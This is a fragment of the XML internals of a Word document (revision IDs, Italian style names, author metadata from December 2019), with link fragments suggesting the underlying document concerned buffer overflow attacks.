    <w:rsid w:val="000B27CB"/>
    <w:rsid w:val="00106F18"/>
    <w:rsid w:val="00132429"/>
    <w:rsid w:val="0014758D"/>
    <w:rsid w:val="001863A0"/>
    <w:rsid w:val="0019599A"/>
    <w:rsid w:val="001B651B"/>
    <w:rsid w:val="001E7606"/>
    <w:rsid w:val="00224FAE"/>
    <w:rsid w:val="0029364E"/>
    <w:rsid w:val="002B15E9"/>
    <w:rsid w:val="002E1543"/>
    <w:rsid w:val="003109D2"/>
    <w:rsid w:val="00372AE7"/>
    <w:rsid w:val="00394F63"/>
    <w:rsid w:val="00412483"/>
    <w:rsid w:val="00491C83"/>
    <w:rsid w:val="004A0CD6"/>
    <w:rsid w:val="004F25E6"/>
    <w:rsid w:val="005448D1"/>
    <w:rsid w:val="00566756"/>
    <w:rsid w:val="0057247C"/>
    <w:rsid w:val="005845AE"/>
    <w:rsid w:val="005C2583"/>
    <w:rsid w:val="0062008F"/>
    <w:rsid w:val="00652558"/>
    <w:rsid w:val="00653DAA"/>
    <w:rsid w:val="00662326"/>
    <w:rsid w:val="006651EA"/>
    <w:rsid w:val="006E43FE"/>
    <w:rsid w:val="00711920"/>
    <w:rsid w:val="0072694C"/>
    <w:rsid w:val="00735E1B"/>
    <w:rsid w:val="007630AA"/>
    <w:rsid w:val="00840516"/>
    <w:rsid w:val="0086563F"/>
    <w:rsid w:val="008B70F6"/>
    <w:rsid w:val="008C447D"/>
    <w:rsid w:val="008C5EFF"/>
    <w:rsid w:val="008E105D"/>
    <w:rsid w:val="0091342A"/>
    <w:rsid w:val="00955870"/>
    <w:rsid w:val="009B725E"/>
    <w:rsid w:val="009F1953"/>
    <w:rsid w:val="00A22DD2"/>
    <w:rsid w:val="00A33982"/>
    <w:rsid w:val="00A7298C"/>
    <w:rsid w:val="00AF02AD"/>
    <w:rsid w:val="00B10081"/>
    <w:rsid w:val="00B728BF"/>
    <w:rsid w:val="00B85042"/>
    <w:rsid w:val="00BB201F"/>
    <w:rsid w:val="00BD1300"/>
    <w:rsid w:val="00C35B5D"/>
    <w:rsid w:val="00C74A3C"/>
    <w:rsid w:val="00C75F93"/>
    <w:rsid w:val="00CD6192"/>
    <w:rsid w:val="00D12893"/>
    <w:rsid w:val="00D82D77"/>
    <w:rsid w:val="00DA0627"/>
    <w:rsid w:val="00DD5D8B"/>
    <w:rsid w:val="00DE4B7E"/>
    <w:rsid w:val="00E144C2"/>
    <w:rsid w:val="00E20032"/>
    <w:rsid w:val="00E21EA7"/>
    <w:rsid w:val="00E93A64"/>
    <w:rsid w:val="00EE265D"/>
    <w:rsid w:val="00F3360A"/>
    <w:rsid w:val="00FA7AFA"/>
    <w:rsid w:val="00FE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264131"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5C518A6C-0453-4EBA-B672-6FD8420A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E43FE"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo1Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00293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19599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Paragrafoelenco">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00BD130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9364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Grigliatabella">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Tabellanormale"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00BB2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667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6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ndsonsecurity.net/files/chapters/buffer_overflow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prea22/Buffer-Overflow-Atta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hJ8IwyhqzD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S0aBV-Wae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11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Spreafico</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Andrea Spreafico</cp:lastModifiedBy>
  <cp:revision>60</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-12T09:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-12T17:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>